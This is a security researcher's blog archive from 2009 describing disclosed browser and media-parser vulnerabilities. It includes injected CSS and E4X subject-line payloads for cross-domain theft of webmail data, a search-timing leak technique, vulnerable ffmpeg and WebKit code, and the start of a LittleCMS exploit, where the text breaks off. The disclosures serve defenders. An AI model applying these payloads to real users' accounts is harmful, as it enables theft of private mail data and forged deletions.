Monday, December 28, 2009

Generic cross-browser cross-domain theft

Well, here's a nice little gem for the festive season. I like it for a few distinct reasons:

  1. It's one of those cases where if you look at web standards from the correct angle, you can see a security vulnerability specified.

  2. Accordingly, it affected all 5 major browsers. And likely the rest.

  3. You can still be a theft victim even with plugins and JavaScript disabled!
It's much less serious than it could be because there are restrictions on the format of cross-domain data which can be stolen, and the attacker needs to be able to exercise limited control of the target theft page.
The issue is best introduced with an example. The example chosen is deliberately a little bit involved and not too severe. This is to give the upcoming browser updates a chance to get deployed.

Example: Yahoo! Mail cross-domain subject line theft and e-mail deletion

(It's important to note there is no apparent failing of the web app in question here).

  • Step 1: E-mail your with the subject line ');}

  • Step 2: Wait a bit (assume that other e-mails are delivered to the victim at this time)

  • Step 3: E-mail your with the subject line {}body{background-image:url(' and include in the body: PLEASE CLICK

  • Step 4: Mild profit if the victim clicks the link.

If you set up the above scenario as a test, you might see something like this in an alert box upon clicking the link:


The above text is stolen cross-domain, and the interesting pieces are highlighted in bold. The data includes the subjects, senders and "mid" value for all e-mails received between the two set-up e-mails we sent the victim.
Although leaking of subjects and senders is not ideal, it's the "mid" value that interests us most as an attacker. This would appear to be a secure / unguessable ID. Accordingly, it is reasonable for the mail application to rely on it as a distinct anti-XSRF token. This is indeed the case for the "delete" operation, implemented as a simple HTTP GET request. Interestingly, the "forward" operation seems to have an additional anti-XSRF token in the POST body, making the "mid" leak not nearly as serious as it could have been.

That's how this whole attack proceeds in its most powerful form: leak a small amount of text cross-domain, and then bingo! if the leaked text happens to include a global anti-XSRF token.

How does it work?

It works by abusing the standards relating to the loading of CSS style sheets. Approximately, the standards are:

  • Send cookies on any load of CSS, including cross-domain.

  • When parsing the returned CSS, ignore any amount of crap leading up to a valid CSS descriptor.
By controlling a little bit of text in the victim domain, the attacker can inject what appears to be a valid CSS string. It does not matter what proceeds this CSS string: HTML, binary data, JSON, XML. The CSS parser will ruthlessly hunt down any CSS constructs within whatever blob is pulled from the victim's domain. To the CSS parser, the text in the above attack looks like this:

(some HTML junk; whatever){} body{background-image:url(' stuff...')}(some trailing HTML junk)

So, the background of the attacker's page will be styled with a background image loaded from an URL, the path of which contains stolen data! One lovely twist of using a CSS string which is an URL is that it will be automatically fetched even if JavaScript is turned off! The stolen data is then harvested by the attacker from their web server logs.
Fortunately, there are various barriers to exploiting this:

  • Any newlines in the injected string break the CSS parse. This is a very common condition which stops potentially serious attacks.

  • CSS strings may be quoted within the ' or " characters. In a context where both of these are escaped (HTML escaped, URL escaped, whatever), it will not be possible to inject a CSS string.

  • The attacker needs control of two injection points: pre-string and post-string. For many sensitive pages, the attacker won't have sufficient influence over the page data via URL params or reflection of attacker data.
General areas that are more susceptible to this attack include:

  • JSON / XML feeds (common lack of newlines; no requirement to escape " (JSON strings) or ' (XML text nodes)).

  • Socially-related websites (the victim is always browsing attacker-controlled strings such as comments on their mundane photos, etc).

How do we fix it?

It would be nice to be able to not send cookies for cross-domain CSS loads; however that would certainly break stuff and it's hard to measure what without actually causing the breakage.

It would be nice to be strict on the MIME type when loading CSS resources -- if not globally then at least for cross-domain loads. But this breaks high profile sites, *cough* and text/plain *cough*. (To be fair, it gets much worse with many sites even using text/html, application/octet-stream, it goes on).

A good balance is to require the alleged CSS to at least start with well-formed CSS, iff it is a cross-domain load and the MIME type is broken. This is the approach I used in my pending WebKit patch.

Note that fixing this issue also fixes my previous attack of using cross-domain CSS to reliably tell if someone is logged in or not:


  • Aaron Sigel, for interesting discussions about using /* styled multi-line comments to bypass the newline restriction. Looks like it's not possible to recover comment text but we didn't test all the browsers.

  • Opera, for seemingly fixing this in v10.10 - although I don't know the exact heuristic used.

  • The WebKit and Mozilla communities for good feedback on approaches and patches.

Tuesday, December 22, 2009

Bypassing the intent of blocking "third-party" cookies

[Aside: I'm not sure anyone cares, particularly because the "block third party cookies" option tends to break legitimate web sites. But I'll document it just in case :)]

Major browsers tend to have an option to block "third-party" cookies. The main intent of this is to disable tracking cookies used by iframe'd ads.

It turns out that you can bypass this intent by abusing "HTML5 Local Storage". This modern browser facility is present in (at least) Firefox 3.5, Safari 4 and even the normally-lagging IE8. Chrome 4 Beta has it too, making it well supported across all browsers and a more tempting target.

In concept, HTML5 Local Storage is very similar to cookies. On a per-origin basis, there is a set of disk-persisted name / value pairs.

With a simple test, it's easy to show that the HTML5 Local Storage feature is not affected by the third-party cookie setting. I believe this holds across all the above browsers. A simple test page that gets / sets a name / value pair from within a third-party iframe may be located here:

(This page also tests for a similar situation with HTML5 Web Database, but that is so far a less supported standard).

What's interesting is that all these browsers did remember to disable these persisted databases in their various private modes.

Friday, December 11, 2009

Cross-domain search timing

I've been meaning to fiddle around with timing attacks for a while. I've had various discussions in the past about the significance of login determination attacks (including ones I found myself) and my usual response would be "it's all moot -- the attacker could just use a timing attack". Finally, here's some ammo to support that position. And -- actual cross-domain data theft using just a timing attack, as a bonus.

Unfortunately, this is another case of the web being built upon broken specifications and protocols. There's nothing to stop domain referencing resources on and timing how long the server takes to respond. For a GET request, a good bet is the <img> tag plus the onerror() / onload() events. For a POST request, you can direct the post to an <iframe> element and monitor the onload() event.

Why should an evil domain be able to read timing information from any other domain? Messy. Actually, it's even worse than that. Even if the core web model didn't fire the relevant event handles for cross-domain loads, there would still be trouble. The attacker is at liberty to monitor the performance of a bunch of busy-loops in Javascript. The attacker then frames or opens a new window for the HTML page they are interested in. When performance drops, the server likely responded. When performance goes up again, the client likely finished rendering. That's two events and actually a leak of more information that the pure-event case.

Moving on to something real. The most usable primitive that this gives the attacker is a 1-bit leak of information. i.e. was the request relatively fast or relatively slow? I have a little demo:

It takes a few seconds, but if I'm not logged into Yahoo! Mail, I see:

DONE! 7 79 76 82

From the relatively flat timings of the last three timings (three different inbox searches) and the relative latency between the first number and the latter three, it's pretty clear I'm not logged in to Yahoo! Mail.

If I'm logged in, I see:

DONE! 10 366 414 539

This is where things get interesting. I am clearly logged in because of the significant server latency inherent in a text search within the inbox. But better still, the last three numbers represent searches for the words nosuchterm1234, sensitive and the. Even with a near-empty inbox, the server has at least a 40ms difference in minimum latency between a query for a word not in the index, and a query for a word in the index. (I mailed myself with sensitive in the subject to make a clear point).

There are many places to go from here. We have a primitive which can be used to ask cross-domain YES/NO questions about a victim's inbox. Depending on the power of the search we are abusing, we can ask all sorts of questions. e.g. "Has the victim ever mailed X?", "If so, within the past day?", "Does the word earnings appear in the last week?", "What about the phrase 'earnings sharply down'?" etc. etc. By asking the right YES/NO questions in the right order, you could reconstruct sentences.

It's important to note this is not a failing in any particular site. A particular site can be following current best practices and still be bitten by this. Fundamentally, many search operations on web sites are non-state-changing GETs or POSTSs and therefore do not need XSRF protection. The solution, of course, is to add it (and do the check before doing any work on the server like walking indexes)!

With thanks to Michal Zalewski for interesting debate and Christoph Kern for pointing out this ACM paper, which I haven't read but from the abstract it sounds like it covers some less serious angles of the same base attack.

Tuesday, November 17, 2009

vsftpd-2.2.2 released

Just a quick note that I released vsftpd-2.2.2.
Most significantly, a regression was fixed in the inbuilt listener. Heavily loaded sites could see a session get booted out just after the initial connect. If you saw "500 OOPS: child died", that was probably this.

Monday, November 2, 2009

A new fuzz frontier: packet boundaries

Recently, I've been getting pretty behind on executing my various research ideas. The only sane thing to do is blog the idea in case someone else wants to run with it and pwn up a bunch of stuff.

The general concept I'd like to see explored is perhaps best explained with a couple of concrete bugs I have found and fixed recently:

  1. Dimensions error parsing XBM image. Welcome to the XBM image format, a veritable dinosaur of image formats. It's a textual format and looks a bit like this:
    #define test_width 8
    #define test_height 14
    static char test_bits[] = {
    0x13, 0x00, 0x15, 0x00, 0x93, 0xcd, 0x55, 0xa5, 0x93, 0xc5, 0x00, 0x80,
    0x00, 0x60 };
    The WebKit XBM parsing code includes this line, to extract the width and height:
            if (sscanf(&input[m_decodeOffset], "#define %*s %i #define %*s %i%n",
    &width, &height, &count) != 2)
    return false;

    The XBM parser supports streaming (making render progress before you have the full data available), including streaming in the header. i.e. the above code will attempt to extract width and height from a partial XBM, and retry with more data if it fails. So what happens if the first network packet contains an XBM fragment of exactly the first 42 bytes of the above example? This looks like:
    #define test_width 8
    #define test_height 1
    I think you can see where this is going. The sscanf() sees two valid integers, and XBM decoding proceeds for an 8x1 image, which is incorrect. The real height, 14, had its ASCII representation fractured across a packet boundary.

  2. Out-of-bounds read skipping over HTML comments. This is best expressed in terms of part of the patch I submitted to fix it:
    --- WebCore/loader/TextResourceDecoder.cpp (revision 44821)
    +++ WebCore/loader/TextResourceDecoder.cpp (working copy)
    @@ -509,11 +509,13 @@ bool TextResourceDecoder::checkForCSSCha
    static inline void skipComment(const char*& ptr, const char* pEnd)
    const char* p = ptr;
    + if (p == pEnd)
    + return;
    // Allow <!-->; other browsers do.
    if (*p == '>') {
    } else {
    - while (p != pEnd) {
    + while (p + 2 < pEnd) {
    if (*p == '-') {
    // This is the real end of comment, "-->".
    if (p[1] == '-' && p[2] == '>') {

    As can be seen, some simple bounds checking was missing. In order to trigger, the browser would need to find itself processing an HTML fragment ending in:
    (Where "ending in" means not necessarily the end of the HTML, but the end of the HTML that we have received so far).
The general principle here? Software seems to have a lot of failure conditions with partial packets! This is unsurprising when you think about it; software is frequently trying to make progress based on partial information -- whether it's image or HTML parsers trying to show progress to the user, or network servers trying to extract a useful header or state transition from a short packet.
Typical fuzzing may not be able to trigger these conditions. I've certainly fuzzed image codecs using local files as inputs. This would never exercise partial packet code paths.
The best way to shake out these bugs is going to be to fuzz the packet boundaries at the same time as the packet data. Let me know if you find anything interesting :)

Monday, October 19, 2009

Chromium and Linux sandboxing

It was great to talk to so many people about Chromium security at HITB Malaysia. I was quite amused to be at a security conference and have a lot of conversations like:

Me: What browser do you use?
Other: Google Chrome.
Me: Why is that?
Other: Oh, it's so much faster.
Me: Oh, you saw that awesome JSNES, huh? (

It's a sobering reminder that users -- and even security experts -- are often making decisions on things like speed and stability. It was similar with vsftpd. I set out to build the most secure FTP server, but usage took off unexpectedly because of the speed and scalability.

Julien talked about his clever Linux sandboxing trick that is used in the Chromium Linux port. One component of the sandbox is an empty chroot() jail, but setting up such a jail is a pain on many levels. The problems and solutions are as follows:
  • chroot() needs root privilege. Therefore, a tiny setuid wrapper binary has been created to execute sandboxed renderer processes. Some people will incorrectly bleat and moan about any new setuid binary, but the irony is that is it required to make your browser more secure. Also, a setuid binary can be made small and careful. It will only execute a specific trusted binary (the Chromium renderer) inside an empty jail.

  • exec()ing something from inside an empty jail is hard, because your view of the filesystem is empty. You could include copies of the needed dynamic libraries or a static executable but both of these are a maintenance and packaging nightmare. This is where Julien's clever tweak comes in. By using the clone() flag CLONE_FS, and sharing the FS structure between a trusted / privileged thread and the exec()ed renderer, the trusted thread can call chroot() and have it affect the unprivileged, untrusted renderer process post-exec. Neat, huh?

  • Other tricks such as CLONE_NEWPID and CLONE_NEWNET are used or will be used to prevent sending of signals from a compromised renderer, and network access.

Finally, it is worth noting that sandboxing vs. risks on the web are widely misunderstood. The current Chromium sandbox mitigates Critical risk bugs to High risk bugs. This may be enhanced in the future. Since any bugs within the sandbox are still High risk, I of course take them very seriously and fix them as a priority. But, that lowering of a certain percentage of your bugs away from Critical risk is really key. The vast majority of web pwnage out there is enabled by Critical risk bugs (i.e. full compromise of user account => ability to install malware), so mitigating any of these down to High is a huge win. It's easy to get excited about any security bug, we as an industry really need to get more practical and concentrate on the ones actually causing damage.

Attacking this point from another angle: any complicated software will inevitably have bugs, and a certain subset of bugs are security bugs. Note that any web browser is certainly a complicated piece of software :) Therefore, any web browser is always going to be having security bugs. And indeed, IE, Opera, Firefox, Safari and Chrome are issuing regular security updates. For some reason, the media reports on each and every patch as if it is a surprising or relevant event. The real question, of course, is what you do in the face of the above realization. The Chromium story is two powerful mitigations: sandboxing to reduce severity away from Critical, and a very fast and agile update system to close any window of risk.

Sunday, October 18, 2009

vsftpd-2.2.1 released

Nothing too exciting, just two regressions fixed: "pasv_address" should work again, and SSL data connections should no longer fail after a long previous transfer or an extended idle period.

Tuesday, October 13, 2009

HITB Malaysia 2009 and sandboxing

No time for details at the moment, but I'm just back from HITB Malaysia and a great time was had by all! The hospitality and warmth of the organizing crew surpassed anything I've ever encountered before.

I presented with my colleague Julien Tinnes. See awesome blog:

We presented on various intriguing aspects of sandboxing on Linux, covering vsftpd and Chromium as test cases. Our slides are located here:

Security in Depth for Linux Software

As per other presentations, I'll leave it at that for now and follow up with a mini series of posts for the more interesting points. I think vsftpd is well covered by previous posts, but Chromium on Linux is awesome and its built-in sandboxing deserves a few notes.

Tuesday, September 22, 2009

Patching ffmpeg into shape

Preface: unless otherwise noted, the bugs discussed here were found via fuzzing by Will Dormann of CERT -- and my involvement was to fix them. In other news, I recently moved to work on the Chromium project / Google Chrome, which I'm very excited about. It is in this new role that this piece of work was conducted, as part of HTML5 features.

I recently fixed a lot of security bugs in ffmpeg, across a subset of the supported containers and codecs. The bugs represented a range of different C vulnerability classes, which I thought might make an interesting blog post.

  1. Out-of-bounds array index read in vorbis_dec.c:

    mapping_setup->submap_floor[j]=get_bits(gb, 8);
    mapping_setup->submap_residue[j]=get_bits(gb, 8);
    no_residue[i]=floor->decode(vc, &floor->data, ch_floor_ptr);

    The index usage is far from where it is read, making this trickier to find by code auditing. Note how this is exploitable, despite being an out-of-bounds read. The out-of-bounds memory is used as a function pointer! It's easy to forget that out-of-bounds reads can be very serious.

  2. Off-by-one indexing error in vp3.c:

    for (j = 0; j < run_length; i++) {
    if (i > s->coded_fragment_list_index)
    return -1;

    if (s->all_fragments[s->coded_fragment_list[i]].qpi == qpi) {

    The > should be >= otherwise there is an out-of-bounds read. In this instance, the out-of-bounds read is for an index that is used to read and write to another array, so you have possible memory corruption as a consequence.
    Found by me with some additional fuzzing.

  3. Interesting pointer arithmetic bug in oggparsevorbis.c:

    while (p < end && n > 0) {
    const char *t, *v;
    int tl, vl;

    s = bytestream_get_le32(&p);

    if (end - p < s)

    t = p;
    p += s;

    The subtlety here is that bytestream_get_le32() advances the pointer passed to it, by sizeof(int). If the current position pointer p points to, say, 3 bytes of remaining buffer, then we have two problems. Firstly, the integer read will be compromised of one byte of out-of-bounds data. More seriously, the condition p > end will end up being true. Subsequently, a very large value of s may escape the check against end - p. This will lead to attacker-controlled out-of-bounds reads later.

  4. Assignment vs. comparison operator mix-up in vorbis_dec.c:

    for(i=0;i<mapping->submaps;++i) {
    vorbis_residue *residue;
    uint_fast8_t ch=0;

    for(j=0;j<vc->audio_channels;++j) {
    if ((mapping->submaps==1) || (i=mapping->mux[j])) {

    Do you see it? This is actually a serious bug because these loops are writing to an output heap buffer, and the loops have been carefully checked so that they will terminate before they overflow said buffer! Unfortunately, assigning to the loop iterator from an attacker-controlled variable will permit the attacker to conduct a heap overflow.
    Found by me via code auditing.

  5. Integer underflow leading to stack pointer wrap-around in vorbis_dec.c:

    uint_fast16_t n_to_read=vr->end-vr->begin;
    uint_fast16_t ptns_to_read=n_to_read/vr->partition_size;
    uint_fast8_t classifs[ptns_to_read*vc->audio_channels];

    All sorts of interesting stuff going on here. For a start, missing validations parsing the header earlier do not prevent begin > end, leading to an integer underflow. Furthermore, uint_fast16_t on my platform at least is a 32-bit wide type. This enables the calculation for the size of the stack-based array to result in any 32-bit value too. On a 32-bit platform, this can result in the stack pointer wrapping around and moving "up" rather than "down". A usually exploitable condition. Even creating a huge (but non-wrap-causing) stack frame can have consequences depending on whether your system does a simple calculation on the stack pointer, or is more careful to fault each new page in case an end-of-stack guard page exists.

  6. Integer underflow by 1 in mov.c:

    static int mov_read_elst(MOVContext *c, ByteIOContext *pb, MOVAtom atom)
    MOVStreamContext *sc = c->fc->streams[c->fc->nb_streams-1]->priv_data;
    sc->time_offset = time != -1 ? time : -duration;

    The problem here is that it is assumed that nb_streams > 0 but no such condition is guaranteed if the attacker supplies an "elst" tag before supplying any tag that creates a stream. The result is that a pointer is used from an out-of-bounds location. Use of any invalid or corrupt pointer is usually an exploitable condition, of course.

  7. Type confusion bug in mov.c / utils.c:
    (No code sample)
    The most interesting bug in my opinion. It triggers when a corrupt ordering of tags in the MOV container sets up some variables such "codec type" is e.g. VIDEO whereas "codec id" is e.g. MP3. Subsequently, some core code passes a pointer to a stack-allocated video structure to the the mp3 decoder. The mp3 decoder, assuming it has a pointer to the (larger) audio structure, happily causes a stack-based buffer overflow. Cool.
    Found by me with some additional fuzzing.

  8. Other:
    This blog post got too long. Other bug classes included divide by zero, infinite looping, stack-based buffer overflow due to missing bounds check, classic integer overflow, and likely others. See the patches if you are interested:

  9. Epilogue: The potential for bugs like these is why Chromium runs codecs inside its built-in sandbox. Although bugs inside the sandbox are still taken seriously, there are no longer of "Critical" severity. The real user damage on the web at this time is conducted by malware exploiting "Critical" severity bugs in some browser or plug-in.

Wednesday, August 12, 2009

vsftpd-2.2.0 released

Not much of interest to add beyond the interesting network isolation support previously discussed. Some minor bugs were fixed. A bunch of compile errors were addressed. There is now support for PAM modules which remap the underlying user account. There is also a new command-line option to pass config file options directly.

Wednesday, August 5, 2009

Apple ColorSync heap overflow

Apple just released the Mac OS X 10.5.8 update, which includes security fixes:

One of the fixes is for a heap-based buffer overflow in the ColorSync component (which handles the parsing of ICC profiles). Limited details are here:

This vulnerability could likely be used to execute arbitrary code in contexts such as Safari browsing to a malicious page. Mail clients (both web-based and local client based) might make an interesting target.

This was discovered because the test case for my earlier LittleCMS (lcms) vulnerabilities happens to crash Safari when you hit it:

Friday, July 10, 2009

Beware the little pieces you use in your web app

I've just released the technical details behind some recently fixed vulnerabilities in mimetex:

"mimetex" is a little binary (written in the C language) used to render mathematical equations based on the TeX language. It looks very nice and is a cool concept to embed it in web apps. You can use a Google search to locate places that use it:

Unfortunately, the binary suffered from various classic stack-based buffer overflows as well as some commands that might leak inappropriate information.

So be careful what random little binaries and pieces you use to beef up your web app.

iPhone and Safari advisories

Catching up on a few items. I seem to have gotten a mention in a couple of recent Apple advisories:

iPhone 3.0 security fixes

Safari 4.0.2

It's one of the Safari bugs that interests me today, CVE-2009-1725 or an off-by-one heap memory corruption in Webkit. The patch says it all, really:

Here's the faulty code:

// ignore the sequence, add it to the buffer as plaintext
*dest++ = '&';
for (unsigned i = 0; i < cBufferPos; i++)
dest[i] = m_cBuffer[i];

Turns out, that 10 should be an 11 so it is possible to write a semi user-controlled byte off-by-one off the end of a heap chunk. If you know what useful tricks you might do with that in the various heap implementations (Windows, Mac, Linux) -- please leave a comment.

Here's a demo HTML document:

It tries to pad the HTML so that the errant byte is written off the end of the heap, instead of into buffer slack. Bear in mind that the most common symptom here is no symptom at all :) In Chrome / Windows, repeated refresh of that URL would occasionally render a random Asian character, but no crash.

Tuesday, July 7, 2009

vsftpd-2.2.0pre1 and network separation

Following on from vsftpd-2.1.2, I've just released vsftpd-2.1.0pre1:

This further plays with the new Linux container flags: this time, CLONE_NEWNET. This flag creates a process with a separate (and empty) list of network devices and bindings. A process isolated in such a way can create network sockets but any attempt to e.g. do an IPv4 connect() to localhost (or any other destination) will get ENETUNREACH.

CLONE_NEWNET is a very new facility and is not yet generally available in Linux distributions. For example, Fedora 11 offers it whereas Ubuntu 9.04 does not.

When available, vsftpd uses CLONE_NEWNET for the unprivileged protocol handler processes (both pre- and post-login). This means a compromised handler process will no longer get access to sensitive networks such as localhost or behind the firewall. This is on top of existing restrictions on the filesystem, local processes and local IPC.

The use of CLONE_NEWNET does provide some design challenges -- fundamentally, the protocol handler needs to be able to connect() out to handle the PORT command. Also, the listening sockets handling PASV need access to network interfaces. vsftpd solves this by re-using its privileged helper architecture. The creation of any data channel network socket is now a privileged operation. The privileged side enforces that a connect() may only be performed back to the real FTP client machine. It hands the resulting socket to the unprivileged protocol handler which then gets to use it as normal since it is already bound to a real network interface and connected. I've checked that attempts to shutdown() and connect() such a socket result in EISCONN so hopefully there is no way to abuse the connected socket on the untrusted side to bypass the CLONE_NEWNET setup. Input welcome. This was fun :)

Thursday, June 18, 2009


I've just noticed that a Google search for "clusterfuzzing" (including the quotes) has no hits. Therefore, I'm reserving the term :) All I need now is a new fuzzing angle and then I've got all the makings of a great presentation!

Actually, I do have a new twist on fuzzing. All I need is the bugs. Watch this space!

Wednesday, June 10, 2009

Bonus Safari XXE (only affecting Safari 4 Beta)

Here's another XXE bug for you (resulting in file theft), just to make the point that this class of bugs is well worth watching out for in client-side applications (such as a browser :)

The good news here is that this WebKit regression was quickly fixed by Apple -- and in time for the Safari 4 final release -- so no production browser should ever have been affected. Just the Safari 4 Beta.

Full credit here to Carlos Pizano who noticed the WebKit regression due to a collision with the Chrome sandbox. I just put together the Safari test case / demo:

Tuesday, June 9, 2009

Apple's Safari 4 also fixes cross-domain XML theft

Safari 4 also fixes an interesting cross-domain XML theft. Full technical details live here:

XML theft can include highly sensitive data thanks to things like XHTML, AJAX-y RPCs using XML and authenticated RSS feeds. The example I have steals XML representing a logged-in Gmail user's inbox:

Safari 3 demo for users logged in to Gmail

I think there's a lot more room for browser-based cross-domain leaks (sometimes called UXSS or universal XSS). This is because the pace of new browser features is very high, and lots more functionality is being added that involves reference by URI. Every such addition is a possible vector for a missing or incorrect (e.g. 302 redirect tricks) cross-domain check; or even an ill-advised specification-based cross-domain leak.

This is one of the serious Safari bugs demoed but not disclosed at my PacSec and HiTB Dubai presentations. I forgot to note that my previous post on file theft was another.

Monday, June 8, 2009

Apple's Safari 4 fixes local file theft attack

Safari 4 was just released and among the various improvements is a range of security fixes. One of these fixes is for an XXE attack against the parsing of the XSL XML. Full technical details may be found here:

Or for the lazy, you can skip straight to the:

Demo for Safari 3 / MacOS
Demo for Safari 3 / Windows

I found it interesting that Safari 3 seemed robust against XXE attacks in general -- there are a lot of places that browsers find themselves parsing XML (XmlHttpRequest, prettifying XML mime type documents, SVG, E4X, etc.) However, the relatively obscure area of the XSL XML succumbed to an XXE attack.

(Note: awareness of XXE attacks remains low despite the issue being documented since at least 2002).

Friday, May 29, 2009

vsftpd-2.1.2 released and new security tricks

(Note: v2.1.2 is the same as v2.1.1 but with a compile fix)

vsftpd-2.1.2 is released with full details as always on the vsftpd home page:

For users, a couple of nasty regressions are fixed: SSL transfers would drop due to an errant timeout firing; this is now fixed. Also, an absent per-user config file was fine with v2.0.7 but an error in v2.1.0. v2.1.2 restores v2.0.7 behaviour.

For Linux developers / security types, there are a couple of much more interesting stories:
  • RLIMIT_NPROC support. Least interestingly, the unprivileged vsftpd processes limit their own ability to launch new processes. A compromise of such a process now does not get to cause a nuisance by flooding the system with more processes. In addition, privilege escalations via kernel bugs in the copious clone() API and involving subtle interactions between collaborating evil processes should be mitigated.

  • RLIMIT_NOFILE support for some of the unprivileged vsftpd processes. This excellent defensive tweak comes courtesy of my colleague Tavis Ormandy with further research by Julien Tinnes. When set to 0, this limit prevents a process from gaining any new file descriptors. So a compromised unprivileged process doesn't get to create new network sockets or open new files. Of course the filesystem aspect is not as good as chroot() because non-fd-based syscalls such as stat() etc. will still leak information and something like rename() may present a total compromise. So there's limited value without combination with a chroot() and also a switch to a different UID to prevent devastating ptrace() attacks. This is a shame because this facility is available to non-root users; and options to voluntarily jail yourself as a non-root user under Linux are generally terrible. There are a couple of additional annoyances: POSIX requires that RLIMIT_NOFILE==0 prevents any file descriptors in a poll() call but curiously not select(). Also, the limit includes file descriptors passed in over a UNIX socket so this precludes some neat designs. Still, an interesting tweak to bear in mind.

  • CLONE_NEWPID / CLONE_NEWIPC support for all distinct vsftpd sessions. These flags were added to the Linux kernel extremely recently, and essentially allow you to launch new processes in isolated PID and IPC ID spaces. This represents further limits on the damage that a compromised vsftpd process could cause. The isolated PID space means no ability to kill() all other vsftpd sessions. (Note that the more serious ptrace() is already carefully defended against with management of the per-process "dumpable" concept). The isolated IPC ID space means no ability to abuse the common flaw of IPC objects with inappropriate world-access permissions.

Wednesday, May 20, 2009

A more plausible E4X attack

As a quick recap, "E4X" is the name of a Javascript standard relating to strong XML support in the language. Firefox has had an implementation for quite some time but no other major browser seems to have followed suit.

My colleages Filipe Almeida and Michal Zalewski led the way in E4X security; check out:

However, the attack scenarios in that document are in my opinion not likely to occur in many web apps. It so happens that I was fiddling around the night before my HiTB talk (which briefly covers E4X) and I came up with something more compelling. Take a hypothetical web mail service which provides an XML feed format of the inbox, which might look something like this:

<mail id="1234"><from></from><subject>{ x = '</subject><body>PWN...</body></mail>
<mail id="1235"><from></from><subject>Super sensitive!</subject><body>New pin: 9976</body></mail>
<mail id="1236"><subject>' }</subject><body>...ed!!</body></mail>

One general concept of interest in the above fragment is the ability of the attacker to echo little pieces of attacker-controlled text onto a trusted domain. Specifically, in e-mail subject text! More on this in another post.
With this realization, we're all set to mount an E4X-based theft attack. First, you'll want to see it in action. You'll need Firefox to see the popup alert indicating cross-domain XML theft:

The attack works by cross-domain including the XML formatted inbox into the attacker's page via <script src="blah">. Raw XML is valid Javascript in Firefox, thanks to E4X, so this parses and executes in the attacker's context. The reason the attacker is able to mount a theft is that E4X looks for curly braces in XML values and tries to interpret the surrounded text as a Javascript expression to evaluate. Looking again at our above XML, we see the following in the middle:

<subject>{ x = '</subject><body>PWN...</body></mail>
<mail id="1235"><from></from><subject>Super sensitive!</subject><body>New pin: 9976</body></mail>
<mail id="1236"><subject>' }

As you can see, the attacker's sneaky choice of subject lines has caused an expression to be evaluated which:
  • Wraps a part of the XML in single quotes, forming a Javascript string literal.
  • Assigns said string literal to a Javascript variable in the attacker's domain!
  • Leaves the XML tag structure balanced, thanks to the repeating nature of the XML tree.

For the attack to work, there are constraints:
  • There must be no newlines in the part of the XML structure that you are stealing, because Javascript literals cannot span unescaped newlines.
  • There must be no XML prolog or DTD since these break the Firefox E4X parser.
  • The single quote character must be rendered into XML values unescaped and double quotes must be used to surround XML attributes (or visa versa).

There will be real-world services matching these constraints. When you find them, drop me an e-mail or leave a comment.
As always, Mozilla security responded wonderfully to this advance in E4X theft. A behavioural tweak was committed and is due in Firefox 3.5, which will break this attack.

Friday, May 1, 2009

HiTB Dubai: all over apart from the blogging

I recently had the pleasure to be invited by Dhillon to present at HackInTheBox (HiTB) Dubai with Billy Rios on our "Cross Domain Leakiness" work. Here is a link to our updated slides:

It was a very productive conference, all told. The sort of conference where new attacks materialise over breakfast conversations. In terms of new and pending material, I'll do separate posts regarding:
  • My latest E4X cross-domain theft attack (building on the work of my colleagues Filipe and Michal)

  • A new "divided login" attack (Billy and I having fun over breakfast)

  • JDK GIFAR fix considered incomplete

  • A new cross-browser cross-domain theft
There was also a very interesting (and perhaps overdue) theme running throughout the conference. It was best put in words during Mark Curphey's keynote address: "builders vs. breakers". And my summary of this is that the industry has too many breakers and not enough builders. Builders have the maturity to step back from the world of random bugs and glitzy hacks, and move the state of security forward. But the economics of the security industry often selects for breakers: the 17 year old kid who finds an XSS in Twitter gets all the press attention; conferences are full of talks about one-off hacks and breaking technologies because the "let's fix it" talks are not showy enough; opinionated and technically lacking blogs and advisories seem to be favoured sources of information.

I'm going to be thinking about contributing more to the building side.

Friday, March 27, 2009

Sun Java JRE Pack200 bugs

A friend of mine, Rich Cannings, spotted my name in a Sun security advisory so I guess this means my Pack200 crashes are fixed:

This bug continues a trend of looking to native code parsers within the JRE, in order to break out of it. The most obvious application is to take over desktops via evil applets which abuse these bugs to cause memory corruptions.

The individual bugs themselves are pretty lame insofar as they are under-researched with a bit of dumb fuzzing. I was simply testing the general area for robustness, and found trouble. Other people have hit the same area, through iDefense, in the past couple of JRE updates -- hopefully they did a better job than me.

The interesting point is that researchers seem to have gotten the point regarding native code in the JRE. I've hit areas such as 2D graphics; ICC parsing and now Pack200 parsing. Others have hit GIF parsers and the font parsing. Aside from well-tested native code (jpeglib, zlib, libpng), and more of the same (e.g. a lot of font / 2D medialib code!), what's left? sun.java2d? Have at it :)

Thursday, March 26, 2009

LittleCMS exploit

Now that new packages are out for lcms and OpenJDK, I'll publish my LittleCMS exploit. It's harmless in that if it actually works on your machine, all it does it put your CPU into a spin -- watch out for 100% CPU usage. It's also relatively harmless in that it doesn't work on many systems out of the box. I targeted my 32-bit Ubuntu 8.10 laptop which happens to have an executable heap, executable stack, no stack cookies but does have ASLR.

Here's the sample JPG file with embedded evil ICC profile:

I'm only bothering to write about this because the story behind the exploit contains a few interesting twists which illustrate the iterative constraint solving used in modern exploits:
  • The underlying code flaw is a stack-based buffer overflow. But the data going past the bounds is not arbitrarily user-controlled. (If it were, a traditional stack smashing exploit would work, but the ASLR could affect the reliability of the exploit). Here's the faulty code in cmsio1.c, where nCurves can end up greater than MAXCHANNELS:

    LCMSBOOL ReadSetOfCurves(LPLCMSICCPROFILE Icc, size_t Offset, LPLUT NewLUT, int nLocation)
    for (i=0; i < nCurves; i++) {

    Curves[i] = ReadCurve(Icc);

  • The data going past bounds is actually pointers to heap chunks (returned by ReadCurve). This is nice because it takes ASLR out of the equation. We'll automatically overwrite %eip with a pointer to a valid heap address. But what is in that heap chunk? If it were arbitrary user controlled data, we'd have game over already, but unfortunately it is not. We're looking at pointers to this structure:

    struct GAMMATABLE {
    unsigned int Crc32;
    int Type;
    double Params[10];
    int nEntries;
    WORD GammaTable[1];

  • There are two types of constructs in the input ICC profile used as a basis to populate this structure: curv and para. curv is of little use to us because it mostly leaves Crc32 set to 0 (or set based only on 16 bits of input entropy). Trying to execute the code 0x00 0x00 is a crash because it dereferences the %eax register: add %al,(%eax), and the value of this register is left as 0 or 1 to denote success of failure when the ReadSetOfCurves function exits.

  • This leaves us looking at a para curve, which calculates Crc32 based very indirectly on some input variables under our control. Although we can't reverse it, we can brute force it with a little program:

    #include "lcms.h"

    void AdjustEndianess32(LPBYTE pByte)
    BYTE temp1;
    BYTE temp2;

    temp1 = *pByte++;
    temp2 = *pByte++;
    *(pByte-1) = *pByte;
    *pByte++ = temp2;
    *(pByte-3) = *pByte;
